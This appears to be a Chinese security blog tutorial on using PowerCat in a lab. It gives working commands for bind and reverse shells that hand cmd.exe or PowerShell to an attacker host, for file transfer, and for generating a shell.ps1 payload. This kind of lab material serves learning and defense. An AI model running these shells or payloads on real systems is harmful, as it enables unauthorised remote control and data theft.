PowerCat反弹Shell

PowerCat介绍     

PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好 用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。

PowerCat安装     

1、下载地址
https://github.com/besimorhino/powercat
2、下载下来导入
Import­Module .\powercat.ps1
3、如果提示未能加载指定模块,则可能是权限问题,输入如下代码
Set-ExecutionPolicy Unrestricted
4、输入如下命令可以查看帮助信息
powercat -h
5、如下就是安装成功
PowerCat命令     
­
-l     监听连接
-c     连接到侦听器
-p     要连接或监听的端口
-e     执行
-ep     执行Powershell
 
-r     中继。格式:“-r tcp:10.1.1.1:443”
-u     通过UDP传输数据
-dns     通过dns传输数据
-dnsft     DNS故障阈值
-t     超时选项。默认值:60
-I     输入:文件路径(字符串),字节数组或字符串
-o     控制台输出类型:“主机”,“字节”或“字符串”
-of     输出文件路径
-d     连接后断开连接
-rep     中继器。断开连接后重新启动
-g     生成有效载荷
-ge     生成编码的有效载荷
-h     打印帮助消息

PowerCat实验环境介     

1、拓扑图

2、主机介绍

机器名称 IP地址 系统版本 备注
攻击机器 192.168.200.140 Windows 10
目标靶机 192.168.200.200 Windows Server 2016
3、PowerCat和nc正向连接     
1、靶机使用powercat执行以下命令
powercat -l -p 8080 -e cmd.exe -v
2、攻击机使用nc执行以下命令
nc 192.168.200.200 8888 -vv
3、查看返回结果

PowerCat和nc反向连接

1、靶机使用powercat执行以下命令
powercat -c 192.168.200.140 -p 8888 -v -e cmd.exe
2、攻击机使用nc执行以下命令
nc -l -p 8888 -vv
 
 
3、查看返回结果
 

PowerCat和PowerCat反向连接     

1、靶机使用powercat执行以下命令
powercat -c 192.168.3.6 -p 9999 -v -ep
 
2、攻击机使用powercat执行以下命令
powercat -l -p 9999 -v
 
3、查看返回结果

PowerCat文件传输     

1、靶机使用powercat执行以下命令
powercat -l -p 9999 -of test.txt -v
2、攻击机使用powercat执行以下命令
powercat -c 192.168.3.10 -p 9999 -i D:\test.txt -v
3、查看返回结果
 

用powercat生成payload     

1、攻击机使用powercat执行以下命令生成payload
powercat -l -p 8000 -e cmd -v -g >> shell.ps1
2、攻击机使用powercat执行以下命令连接
powercat -c 192.168.200.200 -p 8000 -v
3、在靶机上运行脚本
.\shell.ps1
4、查看运行结果
 

文章版权声明 1、本网站名称:Happy峰安全运营之路
2、本站永久网址:https://blog.chenjiangfeng.com
3、本站发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
4、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
5、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
6、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
7、根据《计算机软件保护条例》第十七条,本站所有软件请仅用于学习研究用途

© 版权声明
THE END
喜欢就支持一下吧
点赞9打赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情图片

    暂无评论内容